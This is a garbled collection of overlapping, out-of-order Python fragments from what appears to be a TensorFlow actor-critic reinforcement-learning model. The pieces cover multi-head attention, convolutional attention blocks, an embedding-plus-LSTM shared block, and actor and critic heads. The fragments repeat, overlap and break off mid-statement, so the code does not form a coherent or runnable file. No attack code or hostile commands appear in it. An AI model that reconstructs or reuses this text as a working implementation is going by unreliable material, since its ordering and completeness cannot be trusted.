self.dense2(ff_output) ff_output =", "__init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32,", "attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1,", "= 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block", "vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name,", "matmul_qk / tf.math.sqrt(dk) # add the mask to the scaled tensor. if mask", "embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z): x =", "Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q, k, v,", "(..., seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk", "self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): #", "def split_heads(self, x, batch_size): \"\"\"Split the last dimension into (num_heads, depth). Transpose the", "scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) #", "embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x, z): x = self.shared_block(x, z)", "self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z): x = self.shared_block(x, z) return", "SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units", "add the mask to the scaled tensor. if mask is not None: scaled_attention_logits", "to the scaled tensor. 
if mask is not None: scaled_attention_logits += (mask *", "self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0,", "SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer", "# (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return", "32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,", "lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters,", "**kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 =", "that the scores # add up to 1. 
attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) #", "training=training) x = self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024,", "self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use", "= Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size)", "scaled_attention_logits += (mask * -1e9) # softmax is normalized on the last axis", "self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024,", "v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size,", "self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return", "# softmax is normalized on the last axis (seq_len_k) so that the scores", "embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name,", "32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units,", "# scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) #", "1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model))", "if not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training)", "inputs. 
padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 =", "text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,", "self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return x class", "3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) #", "= residual self.last = last def call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x))", "if self.residual: x = self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if not", "d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model assert d_model %", "outputs have the same shape as inputs. 
padding='same') self.activation_layer = Activation('relu') self.dense1 =", "= self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads,", "mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth)", "as tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense,", "# scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q,", "self.residual = residual self.last = last def call(self, x, training, mask=None): cl_output =", "d_model) v = self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) #", "import Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization,", "mask is not None: scaled_attention_logits += (mask * -1e9) # softmax is normalized", "k, q, mask): batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model)", "self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): # Critic value = self.critic(x,", "is not None: scaled_attention_logits += (mask * -1e9) # softmax is normalized on", "= tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def", "embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation:", "= self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x + attn_output) else: x =", "training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training)", "num_filters=128, lstm_units=10, num_blocks=2, 
vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\",", "return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out =", "self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training, mask=None): z = self.embedding(z) z", "**kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units", "= in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x, z):", "d_model assert d_model % self.num_heads == 0 self.depth = d_model // self.num_heads self.wq", "depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads,", "= tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (...,", "x, z): x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024,", "self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist", "call(self, x, z): # Critic value = self.critic(x, z) # Actor actor_output =", "= embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if", "normalized on the last axis (seq_len_k) so that the scores # add up", "depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output =", "= 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, 
**kwargs)", "== (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention,", "self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last", "x = self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128,", "= in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units", "\"\"\"Split the last dimension into (num_heads, depth). Transpose the result such that the", "return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1,", "# (batch_size, seq_len, d_model) k = self.wk(k) # (batch_size, seq_len, d_model) v =", "self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def", "seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output, attention_weights class", "= Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs have the same", "__init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model assert d_model", "= MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters,", "def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units =", "num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, 
lstm_units=lstm_units,", "= attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2,", "(batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k", "= self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x +", "tensorflow as tf import tensorflow_probability as tfp from tensorflow.keras import Model, Sequential from", "= tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k) #", "+ attn_output) else: x = self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output", "self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x + attn_output) else:", "super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks =", "self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units =", "= tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def", "# add up to 1. 
attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k)", "return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v, k, q, mask): batch_size", "seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__()", "self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)]", "self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model)", "= LSTM(lstm_units) def call(self, x, z, training, mask=None): z = self.embedding(z) z =", "in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim,", "num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd =", "x, z): x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies,", "self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8,", "LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q, k, v, mask):", "the mask to the scaled tensor. 
if mask is not None: scaled_attention_logits +=", "Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the", "= tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) #", "self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs have the", "self.num_heads == 0 self.depth = d_model // self.num_heads self.wq = Dense(d_model) self.wk =", "mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if", "class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model =", "embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x, z): x =", "(batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q,", "z.shape[1]]) x = tf.concat([x, z], -1) for attention_block in self.attention_blocks: x = attention_block(x)", "tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def", "return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads =", "self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184,", "hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5,", "range(num_blocks)] self.lstm_layer = 
LSTM(lstm_units) def call(self, x, z, training, mask=None): z = self.embedding(z)", "self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z],", "super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model assert d_model % self.num_heads ==", "padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate)", "# (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size,", "= self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x + attn_output)", "lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic,", "on the last axis (seq_len_k) so that the scores # add up to", "hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5,", "from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional", "seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention", "perm=[0, 2, 1, 3]) def call(self, v, k, q, mask): batch_size = tf.shape(q)[0]", "= SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out)", "(batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return", "k, transpose_b=True) # (..., seq_len_q, 
seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32)", "training=training) if self.residual: x = self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if", "self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2,", "x, z, training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z,", "self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k) # (batch_size, seq_len, d_model) v", "_ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x +", "if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): # Critic value =", "in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32", "seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention,", "z, training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1],", "class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5,", "= Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1)", "= in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z):", "super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, 
text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units", "output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer):", "d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\",", "mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0],", "softmax is normalized on the last axis (seq_len_k) so that the scores #", "# Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation:", "self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units,", "[AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self,", "x, batch_size): \"\"\"Split the last dimension into (num_heads, depth). 
Transpose the result such", "self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer", "k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) #", "class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5,", "tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist = tfp.distributions.Normal(loc=actor_output, scale=std) return value, dist", "= tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention =", "= matmul_qk / tf.math.sqrt(dk) # add the mask to the scaled tensor. if", "z) # Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if", "self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units,", "that the shape is (batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size,", "the last dimension into (num_heads, depth). Transpose the result such that the shape", "q, mask): batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model) k", "kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim,", "mask): batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model) k =", "as inputs. 
padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2", "self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x =", "z], -1) for attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer):", "__init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32,", "cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual:", "lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1,", "= scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3])", "2, 1, 3]) def call(self, v, k, q, mask): batch_size = tf.shape(q)[0] q", "(batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights", "filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs have the same shape as", "class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units", "attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184,", "= Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # 
Use 'same'", "scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention", "== (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask)", "not None: scaled_attention_logits += (mask * -1e9) # softmax is normalized on the", "call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self,", "in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size,", "call(self, v, k, q, mask): batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size,", "output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True,", "super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units =", "= self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10,", "super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units =", "result such that the shape is (batch_size, num_heads, seq_len, depth) \"\"\" x =", "num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim,", "embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, 
in_lstm_units = in_lstm_units, text_lenght=5, embedding_out =", "the scores # add up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (...,", "Activation('sigmoid') def call(self, x, z): # Critic value = self.critic(x, z) # Actor", "kernel_size=kernel_size, # Use 'same' padding so outputs have the same shape as inputs.", "= self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x,", "v) # (..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model,", "2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1,", "tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention,", "the result such that the shape is (batch_size, num_heads, seq_len, depth) \"\"\" x", "= self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v) # (batch_size, seq_len, d_model)", "**kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer =", "not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x", "(batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention", "# add the mask to the scaled tensor. if mask is not None:", "= tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for", "# Use 'same' padding so outputs have the same shape as inputs. 
padding='same')", "num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output')", "Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def call(self, x,", "v = self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size,", "text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self,", "in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x,", "self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x)", "import numpy as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k,", "text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic =", "= self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) #", "(num_heads, depth). 
